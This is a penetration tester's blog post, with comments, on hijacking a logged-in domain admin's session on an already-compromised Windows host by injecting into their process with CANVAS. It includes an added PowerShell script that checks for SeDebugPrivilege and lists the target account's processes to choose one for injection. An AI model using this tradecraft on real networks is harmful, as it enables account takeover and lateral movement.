I really try not to rant, but since this is my blog I'll vent a little. A poster on a forum is asking for help getting pass-the-hash functionality into CANVAS. Beyond the fact that he could simply upload and run an existing tool, he's still missing a few key points.
First, you don't need to crack the hash. Cracking is often useful, since a list of working passwords is one of the best ways to maintain access to a network, but it's a nice-to-have, not a requirement.
Second, the scenario he describes is a remote system that is already compromised, where a domain admin then logs in via RDP or uses domain credentials against a SQL server on that box. If you're SYSTEM on the local machine, you can inject into that user's process, and at that point you are the domain user/admin. This is nicer than pass-the-hash: you inherit the user's existing logon session, Kerberos tickets included, instead of replaying an NTLM hash, and you can keep the process alive for as long as you need it.
To do this, open CANVAS, browse to Commands->PROCESSINJECT and inject into one of the user's processes (the RDP session's explorer.exe, iexplore.exe, firefox.exe, Word, whatever). From that point CANVAS executes commands as the owner of that process, with the same domain privileges as that user. Note that you need SeDebugPrivilege to open another user's process: SYSTEM has it, and by default it is granted only to Administrators, not to Power Users.
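Before the PROCESSINJECT step you have to know which process to pick, and that the token you are running under can actually open it. The script below is an added example, not CANVAS code and not part of the original post: it checks the current token for SeDebugPrivilege and lists processes owned by a target domain account so you can choose a long-lived one. The domain and user names are assumed placeholders; replace them with the account you are after.

```powershell
# Added example (not CANVAS code). Run it as SYSTEM or a local Administrator
# on the compromised host. The owner lookup itself does not need
# SeDebugPrivilege, but opening the process for injection does.
param(
    [string]$TargetDomain = 'CORP',     # assumed domain NetBIOS name, replace
    [string]$TargetUser   = 'da-admin'  # assumed target account, replace
)

# 1. Is the privilege the injection step needs present, and is it enabled?
#    'whoami /priv' prints one row per privilege with its State column.
$priv = whoami /priv | Select-String 'SeDebugPrivilege'
if (-not $priv) {
    Write-Warning 'SeDebugPrivilege is not in this token; opening another user''s process will fail.'
} elseif ($priv.Line -match 'Disabled') {
    Write-Warning 'SeDebugPrivilege is present but disabled; the injection tool must enable it first.'
}

# 2. Enumerate processes with their owning account.
#    Win32_Process.GetOwner() returns the Domain and User of the process token;
#    ReturnValue 0 means the lookup succeeded.
$candidates = Get-CimInstance Win32_Process | ForEach-Object {
    $owner = Invoke-CimMethod -InputObject $_ -MethodName GetOwner
    if ($owner.ReturnValue -eq 0) {
        [pscustomobject]@{
            PID     = $_.ProcessId
            Name    = $_.Name
            Domain  = $owner.Domain
            User    = $owner.User
            Session = $_.SessionId   # RDP logons show up as a separate session
        }
    }
} | Where-Object { $_.Domain -eq $TargetDomain -and $_.User -eq $TargetUser }

# 3. Report. Prefer explorer.exe (lives as long as the interactive session)
#    over transient processes that may exit while you are using them.
if (-not $candidates) {
    Write-Output "No processes owned by $TargetDomain\$TargetUser right now; wait for a logon (RDP, service, scheduled task)."
} else {
    $candidates |
        Sort-Object { $_.Name -ne 'explorer.exe' }, PID |
        Format-Table -AutoSize
}
```

The PID at the top of the table is the one to hand to PROCESSINJECT. If the list is empty the account simply has no process on the box yet, which is the case the post's approach cannot help with; you wait, or you fall back to hashes.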
Kerberos is a single-sign-on protocol, so what makes you think that it will not be vulnerable to a pass-the-hash attack?
Granted, there are no tools publicly available that do that on Kerberos. But when it becomes a stream there are no guarantees that this will be the case.
Or are there guarantees that Kerberos will be immune against pass-the-hash attacks?
To my knowledge Kerberos isn't vulnerable to PTH-style attacks, due to the fact that permission tokens are time-based and limited. I'm not a Kerberos expert – not even close – so I won't dig into possible attack vectors. My point is that if you have SYSTEM on a box (generally required for PTH) and a process is running, or will run, with the account you need, injecting into the process is easier. It's a tried and true technique.
The issue is mostly letting what you want to do interfere with what you’re trying to do.